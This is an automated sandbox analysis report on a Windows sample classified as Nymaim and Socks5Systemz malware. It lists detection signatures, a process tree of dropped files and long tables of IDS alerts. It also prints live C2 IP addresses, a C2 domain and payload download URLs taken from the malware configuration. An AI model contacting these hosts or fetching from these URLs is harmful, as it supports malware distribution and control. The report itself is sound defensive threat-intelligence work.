Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1559044
MD5:5237853dbebaefb1dfa86130dd1d39fa
SHA1:c2a42211c8970e1f10cc13261d5e133739c196f4
SHA256:e185e43f039f7a97672db4a44597abd6d2bf49c08d7bc689318a098ec826bb00
Tags:exeSocks5Systemzuser-Bitsight
Infos:

Detection

Nymaim, Socks5Systemz
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Nymaim
Yara detected Socks5Systemz
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to infect the boot sector
Contains functionality to inject code into remote processes
Found API chain indicative of debugger detection
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6508 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5237853DBEBAEFB1DFA86130DD1D39FA)
    • file.exe (PID: 6556 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5237853DBEBAEFB1DFA86130DD1D39FA)
      • NqISs1vOr.exe (PID: 6872 cmdline: "C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe" MD5: 98C5D582966DD7E46FF73E7D6D62B87D)
        • NqISs1vOr.tmp (PID: 6916 cmdline: "C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmp" /SL5="$403E6,3817417,54272,C:\Users\user\AppData\Roaming\0L1IPDf6p\NqISs1vOr.exe" MD5: 62FDBBA6364B54BBE42B437284A2963C)
          • net.exe (PID: 7036 cmdline: "C:\Windows\system32\net.exe" pause alter_game_11196 MD5: 31890A7DE89936F922D44D677F681A7F)
            • conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • net1.exe (PID: 980 cmdline: C:\Windows\system32\net1 pause alter_game_11196 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
          • altergame32.exe (PID: 2488 cmdline: "C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exe" -i MD5: C1DEEF6663EFF952E8990193B3452A2F)
      • ebAAb6KfuCx7.exe (PID: 3236 cmdline: "C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exe" MD5: F328A95046E3A2514C36347EAEC911C0)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NymaimNymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

Malware Configuration

Threatname: Socks5Systemz

{"C2 list": ["boietuj.com"]}

Threatname: Nymaim

{"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3048791159.0000000002E41000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
    00000000.00000002.1816901578.0000000000630000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000000.00000002.1816811085.0000000000560000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x82d5:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000006.00000002.3048714500.0000000002D95000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
        Process Memory Space: altergame32.exe PID: 2488JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.file.exe.6315a0.1.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security

            Sigma Signatures

            No Sigma rule has matched

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-20T05:03:19.330150+010020494671A Network Trojan was detected192.168.2.449858185.208.158.20280TCP
            2024-11-20T05:03:19.707958+010020494671A Network Trojan was detected192.168.2.449858185.208.158.20280TCP
            2024-11-20T05:03:22.679741+010020494671A Network Trojan was detected192.168.2.449858185.208.158.20280TCP
            2024-11-20T05:03:23.511115+010020494671A Network Trojan was detected192.168.2.449885185.208.158.20280TCP
            2024-11-20T05:03:24.349525+010020494671A Network Trojan was detected192.168.2.449892185.208.158.20280TCP
            2024-11-20T05:03:25.182992+010020494671A Network Trojan was detected192.168.2.449898185.208.158.20280TCP
            2024-11-20T05:03:26.013459+010020494671A Network Trojan was detected192.168.2.449904185.208.158.20280TCP
            2024-11-20T05:03:26.986222+010020494671A Network Trojan was detected192.168.2.449910185.208.158.20280TCP
            2024-11-20T05:03:27.814581+010020494671A Network Trojan was detected192.168.2.449917185.208.158.20280TCP
            2024-11-20T05:03:28.175922+010020494671A Network Trojan was detected192.168.2.449917185.208.158.20280TCP
            2024-11-20T05:03:29.003148+010020494671A Network Trojan was detected192.168.2.449927185.208.158.20280TCP
            2024-11-20T05:03:29.864671+010020494671A Network Trojan was detected192.168.2.449933185.208.158.20280TCP
            2024-11-20T05:03:30.897323+010020494671A Network Trojan was detected192.168.2.449939185.208.158.20280TCP
            2024-11-20T05:03:31.290583+010020494671A Network Trojan was detected192.168.2.449939185.208.158.20280TCP
            2024-11-20T05:03:32.129208+010020494671A Network Trojan was detected192.168.2.449945185.208.158.20280TCP
            2024-11-20T05:03:32.485151+010020494671A Network Trojan was detected192.168.2.449945185.208.158.20280TCP
            2024-11-20T05:03:33.323396+010020494671A Network Trojan was detected192.168.2.449956185.208.158.20280TCP
            2024-11-20T05:03:34.155422+010020494671A Network Trojan was detected192.168.2.449962185.208.158.20280TCP
            2024-11-20T05:03:35.150207+010020494671A Network Trojan was detected192.168.2.449968185.208.158.20280TCP
            2024-11-20T05:03:36.033281+010020494671A Network Trojan was detected192.168.2.449974185.208.158.20280TCP
            2024-11-20T05:03:36.989737+010020494671A Network Trojan was detected192.168.2.449980185.208.158.20280TCP
            2024-11-20T05:03:37.360947+010020494671A Network Trojan was detected192.168.2.449980185.208.158.20280TCP
            2024-11-20T05:03:37.716797+010020494671A Network Trojan was detected192.168.2.449980185.208.158.20280TCP
            2024-11-20T05:03:38.564118+010020494671A Network Trojan was detected192.168.2.449991185.208.158.20280TCP
            2024-11-20T05:03:38.925442+010020494671A Network Trojan was detected192.168.2.449991185.208.158.20280TCP
            2024-11-20T05:03:39.993516+010020494671A Network Trojan was detected192.168.2.449999185.208.158.20280TCP
            2024-11-20T05:03:40.837006+010020494671A Network Trojan was detected192.168.2.450004185.208.158.20280TCP
            2024-11-20T05:03:41.685590+010020494671A Network Trojan was detected192.168.2.450011185.208.158.20280TCP
            2024-11-20T05:03:42.515663+010020494671A Network Trojan was detected192.168.2.450017185.208.158.20280TCP
            2024-11-20T05:03:43.344138+010020494671A Network Trojan was detected192.168.2.450023185.208.158.20280TCP
            2024-11-20T05:03:44.181802+010020494671A Network Trojan was detected192.168.2.450028185.208.158.20280TCP
            2024-11-20T05:03:45.014578+010020494671A Network Trojan was detected192.168.2.450029185.208.158.20280TCP
            2024-11-20T05:03:45.841220+010020494671A Network Trojan was detected192.168.2.450030185.208.158.20280TCP
            2024-11-20T05:03:46.665553+010020494671A Network Trojan was detected192.168.2.450031185.208.158.20280TCP
            2024-11-20T05:03:47.498201+010020494671A Network Trojan was detected192.168.2.450032185.208.158.20280TCP
            2024-11-20T05:03:48.354773+010020494671A Network Trojan was detected192.168.2.450033185.208.158.20280TCP
            2024-11-20T05:03:49.183437+010020494671A Network Trojan was detected192.168.2.450034185.208.158.20280TCP
            2024-11-20T05:03:50.006850+010020494671A Network Trojan was detected192.168.2.450035185.208.158.20280TCP
            2024-11-20T05:03:50.849542+010020494671A Network Trojan was detected192.168.2.450036185.208.158.20280TCP
            2024-11-20T05:03:51.338903+010020494671A Network Trojan was detected192.168.2.450036185.208.158.20280TCP
            2024-11-20T05:03:52.189569+010020494671A Network Trojan was detected192.168.2.450037185.208.158.20280TCP
            2024-11-20T05:03:52.550809+010020494671A Network Trojan was detected192.168.2.450037185.208.158.20280TCP
            2024-11-20T05:03:52.911402+010020494671A Network Trojan was detected192.168.2.450037185.208.158.20280TCP
            2024-11-20T05:03:53.274782+010020494671A Network Trojan was detected192.168.2.450037185.208.158.20280TCP
            2024-11-20T05:03:54.114938+010020494671A Network Trojan was detected192.168.2.450038185.208.158.20280TCP
            2024-11-20T05:03:54.469937+010020494671A Network Trojan was detected192.168.2.450038185.208.158.20280TCP
            2024-11-20T05:03:54.962762+010020494671A Network Trojan was detected192.168.2.450038185.208.158.20280TCP
            2024-11-20T05:03:55.796532+010020494671A Network Trojan was detected192.168.2.450039185.208.158.20280TCP
            2024-11-20T05:03:56.638762+010020494671A Network Trojan was detected192.168.2.450040185.208.158.20280TCP
            2024-11-20T05:03:57.469980+010020494671A Network Trojan was detected192.168.2.450041185.208.158.20280TCP
            2024-11-20T05:03:58.720031+010020494671A Network Trojan was detected192.168.2.450042185.208.158.20280TCP
            2024-11-20T05:03:59.578052+010020494671A Network Trojan was detected192.168.2.450043185.208.158.20280TCP
            2024-11-20T05:04:00.430705+010020494671A Network Trojan was detected192.168.2.450044185.208.158.20280TCP
            2024-11-20T05:04:01.290859+010020494671A Network Trojan was detected192.168.2.450045185.208.158.20280TCP
            2024-11-20T05:04:02.423851+010020494671A Network Trojan was detected192.168.2.450046185.208.158.20280TCP
            2024-11-20T05:04:02.792646+010020494671A Network Trojan was detected192.168.2.450046185.208.158.20280TCP
            2024-11-20T05:04:03.640276+010020494671A Network Trojan was detected192.168.2.450047185.208.158.20280TCP
            2024-11-20T05:04:04.467375+010020494671A Network Trojan was detected192.168.2.450048185.208.158.20280TCP
            2024-11-20T05:04:05.296380+010020494671A Network Trojan was detected192.168.2.450049185.208.158.20280TCP
            2024-11-20T05:04:06.232401+010020494671A Network Trojan was detected192.168.2.450050185.208.158.20280TCP
            2024-11-20T05:04:07.075224+010020494671A Network Trojan was detected192.168.2.450051185.208.158.20280TCP
            2024-11-20T05:04:07.930877+010020494671A Network Trojan was detected192.168.2.450052185.208.158.20280TCP
            2024-11-20T05:04:08.770839+010020494671A Network Trojan was detected192.168.2.450053185.208.158.20280TCP
            2024-11-20T05:04:09.241906+010020494671A Network Trojan was detected192.168.2.450053185.208.158.20280TCP
            2024-11-20T05:04:10.097218+010020494671A Network Trojan was detected192.168.2.450054185.208.158.20280TCP
            2024-11-20T05:04:10.465007+010020494671A Network Trojan was detected192.168.2.450054185.208.158.20280TCP
            2024-11-20T05:04:11.292434+010020494671A Network Trojan was detected192.168.2.450055185.208.158.20280TCP
            2024-11-20T05:04:13.148623+010020494671A Network Trojan was detected192.168.2.450056185.208.158.20280TCP
            2024-11-20T05:04:13.978186+010020494671A Network Trojan was detected192.168.2.450057185.208.158.20280TCP
            2024-11-20T05:04:14.830874+010020494671A Network Trojan was detected192.168.2.450058185.208.158.20280TCP
            2024-11-20T05:04:15.203927+010020494671A Network Trojan was detected192.168.2.450058185.208.158.20280TCP
            2024-11-20T05:04:16.029802+010020494671A Network Trojan was detected192.168.2.450059185.208.158.20280TCP
            2024-11-20T05:04:16.852260+010020494671A Network Trojan was detected192.168.2.450060185.208.158.20280TCP
            2024-11-20T05:04:17.704692+010020494671A Network Trojan was detected192.168.2.450061185.208.158.20280TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-11-20T05:03:19.330150+010020501121A Network Trojan was detected192.168.2.449858185.208.158.20280TCP
            2024-11-20T05:03:19.707958+010020501121A Network Trojan was detected192.168.2.449858185.208.158.20280TCP
            2024-11-20T05:03:22.679741+010020501121A Network Trojan was detected192.168.2.449858185.208.158.20280TCP
            2024-11-20T05:03:23.511115+010020501121A Network Trojan was detected192.168.2.449885185.208.158.20280TCP
            2024-11-20T05:03:24.349525+010020501121A Network Trojan was detected192.168.2.449892185.208.158.20280TCP
            2024-11-20T05:03:25.182992+010020501121A Network Trojan was detected192.168.2.449898185.208.158.20280TCP
            2024-11-20T05:03:26.013459+010020501121A Network Trojan was detected192.168.2.449904185.208.158.20280TCP
            2024-11-20T05:03:26.986222+010020501121A Network Trojan was detected192.168.2.449910185.208.158.20280TCP
            2024-11-20T05:03:27.814581+010020501121A Network Trojan was detected192.168.2.449917185.208.158.20280TCP
            2024-11-20T05:03:28.175922+010020501121A Network Trojan was detected192.168.2.449917185.208.158.20280TCP
            2024-11-20T05:03:29.003148+010020501121A Network Trojan was detected192.168.2.449927185.208.158.20280TCP
            2024-11-20T05:03:29.864671+010020501121A Network Trojan was detected192.168.2.449933185.208.158.20280TCP
            2024-11-20T05:03:30.897323+010020501121A Network Trojan was detected192.168.2.449939185.208.158.20280TCP
            2024-11-20T05:03:31.290583+010020501121A Network Trojan was detected192.168.2.449939185.208.158.20280TCP
            2024-11-20T05:03:32.129208+010020501121A Network Trojan was detected192.168.2.449945185.208.158.20280TCP
            2024-11-20T05:03:32.485151+010020501121A Network Trojan was detected192.168.2.449945185.208.158.20280TCP
            2024-11-20T05:03:33.323396+010020501121A Network Trojan was detected192.168.2.449956185.208.158.20280TCP
            2024-11-20T05:03:34.155422+010020501121A Network Trojan was detected192.168.2.449962185.208.158.20280TCP
            2024-11-20T05:03:35.150207+010020501121A Network Trojan was detected192.168.2.449968185.208.158.20280TCP
            2024-11-20T05:03:36.033281+010020501121A Network Trojan was detected192.168.2.449974185.208.158.20280TCP
            2024-11-20T05:03:36.989737+010020501121A Network Trojan was detected192.168.2.449980185.208.158.20280TCP
            2024-11-20T05:03:37.360947+010020501121A Network Trojan was detected192.168.2.449980185.208.158.20280TCP
            2024-11-20T05:03:37.716797+010020501121A Network Trojan was detected192.168.2.449980185.208.158.20280TCP
            2024-11-20T05:03:38.564118+010020501121A Network Trojan was detected192.168.2.449991185.208.158.20280TCP
            2024-11-20T05:03:38.925442+010020501121A Network Trojan was detected192.168.2.449991185.208.158.20280TCP
            2024-11-20T05:03:39.993516+010020501121A Network Trojan was detected192.168.2.449999185.208.158.20280TCP
            2024-11-20T05:03:40.837006+010020501121A Network Trojan was detected192.168.2.450004185.208.158.20280TCP
            2024-11-20T05:03:41.685590+010020501121A Network Trojan was detected192.168.2.450011185.208.158.20280TCP
            2024-11-20T05:03:42.515663+010020501121A Network Trojan was detected192.168.2.450017185.208.158.20280TCP
            2024-11-20T05:03:43.344138+010020501121A Network Trojan was detected192.168.2.450023185.208.158.20280TCP
            2024-11-20T05:03:44.181802+010020501121A Network Trojan was detected192.168.2.450028185.208.158.20280TCP
            2024-11-20T05:03:45.014578+010020501121A Network Trojan was detected192.168.2.450029185.208.158.20280TCP
            2024-11-20T05:03:45.841220+010020501121A Network Trojan was detected192.168.2.450030185.208.158.20280TCP
            2024-11-20T05:03:46.665553+010020501121A Network Trojan was detected192.168.2.450031185.208.158.20280TCP
            2024-11-20T05:03:47.498201+010020501121A Network Trojan was detected192.168.2.450032185.208.158.20280TCP
            2024-11-20T05:03:48.354773+010020501121A Network Trojan was detected192.168.2.450033185.208.158.20280TCP
            2024-11-20T05:03:49.183437+010020501121A Network Trojan was detected192.168.2.450034185.208.158.20280TCP
            2024-11-20T05:03:50.006850+010020501121A Network Trojan was detected192.168.2.450035185.208.158.20280TCP
            2024-11-20T05:03:50.849542+010020501121A Network Trojan was detected192.168.2.450036185.208.158.20280TCP
            2024-11-20T05:03:51.338903+010020501121A Network Trojan was detected192.168.2.450036185.208.158.20280TCP
            2024-11-20T05:03:52.189569+010020501121A Network Trojan was detected192.168.2.450037185.208.158.20280TCP
            2024-11-20T05:03:52.550809+010020501121A Network Trojan was detected192.168.2.450037185.208.158.20280TCP
            2024-11-20T05:03:52.911402+010020501121A Network Trojan was detected192.168.2.450037185.208.158.20280TCP
            2024-11-20T05:03:53.274782+010020501121A Network Trojan was detected192.168.2.450037185.208.158.20280TCP
            2024-11-20T05:03:54.114938+010020501121A Network Trojan was detected192.168.2.450038185.208.158.20280TCP
            2024-11-20T05:03:54.469937+010020501121A Network Trojan was detected192.168.2.450038185.208.158.20280TCP
            2024-11-20T05:03:54.962762+010020501121A Network Trojan was detected192.168.2.450038185.208.158.20280TCP
            2024-11-20T05:03:55.796532+010020501121A Network Trojan was detected192.168.2.450039185.208.158.20280TCP
            2024-11-20T05:03:56.638762+010020501121A Network Trojan was detected192.168.2.450040185.208.158.20280TCP
            2024-11-20T05:03:57.469980+010020501121A Network Trojan was detected192.168.2.450041185.208.158.20280TCP
            2024-11-20T05:03:58.720031+010020501121A Network Trojan was detected192.168.2.450042185.208.158.20280TCP
            2024-11-20T05:03:59.578052+010020501121A Network Trojan was detected192.168.2.450043185.208.158.20280TCP
            2024-11-20T05:04:00.430705+010020501121A Network Trojan was detected192.168.2.450044185.208.158.20280TCP
            2024-11-20T05:04:01.290859+010020501121A Network Trojan was detected192.168.2.450045185.208.158.20280TCP
            2024-11-20T05:04:02.423851+010020501121A Network Trojan was detected192.168.2.450046185.208.158.20280TCP
            2024-11-20T05:04:02.792646+010020501121A Network Trojan was detected192.168.2.450046185.208.158.20280TCP
            2024-11-20T05:04:03.640276+010020501121A Network Trojan was detected192.168.2.450047185.208.158.20280TCP
            2024-11-20T05:04:04.467375+010020501121A Network Trojan was detected192.168.2.450048185.208.158.20280TCP
            2024-11-20T05:04:05.296380+010020501121A Network Trojan was detected192.168.2.450049185.208.158.20280TCP
            2024-11-20T05:04:06.232401+010020501121A Network Trojan was detected192.168.2.450050185.208.158.20280TCP
            2024-11-20T05:04:07.075224+010020501121A Network Trojan was detected192.168.2.450051185.208.158.20280TCP
            2024-11-20T05:04:07.930877+010020501121A Network Trojan was detected192.168.2.450052185.208.158.20280TCP
            2024-11-20T05:04:08.770839+010020501121A Network Trojan was detected192.168.2.450053185.208.158.20280TCP
            2024-11-20T05:04:09.241906+010020501121A Network Trojan was detected192.168.2.450053185.208.158.20280TCP
            2024-11-20T05:04:10.097218+010020501121A Network Trojan was detected192.168.2.450054185.208.158.20280TCP
            2024-11-20T05:04:10.465007+010020501121A Network Trojan was detected192.168.2.450054185.208.158.20280TCP
            2024-11-20T05:04:11.292434+010020501121A Network Trojan was detected192.168.2.450055185.208.158.20280TCP
            2024-11-20T05:04:13.148623+010020501121A Network Trojan was detected192.168.2.450056185.208.158.20280TCP
            2024-11-20T05:04:13.978186+010020501121A Network Trojan was detected192.168.2.450057185.208.158.20280TCP
            2024-11-20T05:04:14.830874+010020501121A Network Trojan was detected192.168.2.450058185.208.158.20280TCP
            2024-11-20T05:04:15.203927+010020501121A Network Trojan was detected192.168.2.450058185.208.158.20280TCP
            2024-11-20T05:04:16.029802+010020501121A Network Trojan was detected192.168.2.450059185.208.158.20280TCP
            2024-11-20T05:04:16.852260+010020501121A Network Trojan was detected192.168.2.450060185.208.158.20280TCP
            2024-11-20T05:04:17.704692+010020501121A Network Trojan was detected192.168.2.450061185.208.158.20280TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: file.exeAvira: detected
            Antivirus detection for URL or domain
            Source: http://185.156.72.65/add?substr=mixeleven&s=three&sub=nosubAvira URL Cloud: Label: malware
            Source: http://185.156.72.65/files/downloadAvira URL Cloud: Label: malware
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PAB1[1].fileAvira: detection malicious, Label: PUA/Agent.EI
            Found malware configuration
            Source: 0.2.file.exe.6315a0.1.raw.unpackMalware Configuration Extractor: Nymaim {"C2 addresses": ["185.156.72.65", "185.156.72.65", "185.156.72.65", "185.156.72.65"]}
            Source: altergame32.exe.2488.6.memstrminMalware Configuration Extractor: Socks5Systemz {"C2 list": ["boietuj.com"]}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\PAB1[1].fileReversingLabs: Detection: 54%
            Source: C:\Users\user\AppData\Roaming\xMs8rtQRv7K\ebAAb6KfuCx7.exeReversingLabs: Detection: 54%
            Multi AV Scanner detection for submitted file
            Source: file.exeReversingLabs: Detection: 36%
            Source: file.exeVirustotal: Detection: 39%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeJoe Sandbox ML: detected
            Source: C:\ProgramData\EShineEncoder\EShineEncoder.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: file.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0045CFA8 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,3_2_0045CFA8
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0045D05C ArcFourCrypt,3_2_0045D05C
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_0045D074 ArcFourCrypt,3_2_0045D074
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_10001000 ISCryptGetVersion,3_2_10001000
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_10001130 ArcFourCrypt,3_2_10001130

            Compliance

            barindex
            Detected unpacking (overwrites its own PE header)
            Source: C:\Users\user\AppData\Local\AlterGame 1.13\altergame32.exeUnpacked PE file: 6.2.altergame32.exe.400000.0.unpack
            Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AlterGame_is1Jump to behavior
            Source: Binary string: msvcp71.pdbx# source: is-PR9GR.tmp.3.dr
            Source: Binary string: msvcr71.pdb< source: is-GSS65.tmp.3.dr
            Source: Binary string: msvcp71.pdb source: is-PR9GR.tmp.3.dr
            Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-28G11.tmp.3.dr
            Source: Binary string: C:\Users\79631\source\repos\Gcleanerapp\Gcleanerapp\obj\Release\Gcleanerapp.pdb source: ebAAb6KfuCx7.exe, 00000008.00000000.1932852369.00000000008F2000.00000002.00000001.01000000.0000000C.sdmp, PAB1[1].file.1.dr, ebAAb6KfuCx7.exe.1.dr
            Source: Binary string: msvcr71.pdb source: is-GSS65.tmp.3.dr
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00452A34 FindFirstFileA,GetLastError,3_2_00452A34
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00474D70 FindFirstFileA,FindNextFileA,FindClose,3_2_00474D70
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00462578 FindFirstFileA,FindNextFileA,FindClose,3_2_00462578
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_004975B0 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,3_2_004975B0
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00463B04 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,3_2_00463B04
            Source: C:\Users\user\AppData\Local\Temp\is-JSG7N.tmp\NqISs1vOr.tmpCode function: 3_2_00463F80 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,3_2_00463F80
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404250 SetFileAttributesW,GetCommConfig,EnumCalendarInfoW,GetLogicalDriveStringsA,SetComputerNameA,ChangeTimerQueueTimer,GetTempFileNameW,EnumTimeFormatsA,WriteConsoleInputW,GetVersionExA,InterlockedIncrement,GlobalUnWire,0_2_00404250

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49858 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49858 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49892 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49892 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49885 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49885 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49898 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49904 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49898 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49904 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49917 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49917 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49910 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49910 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2049467 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 : 192.168.2.4:49927 -> 185.208.158.202:80
            Source: Network trafficSuricata IDS: 2050112 - Severity 1 - ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 : 192.168.2.4:49927 -> 185.208.158.202:80
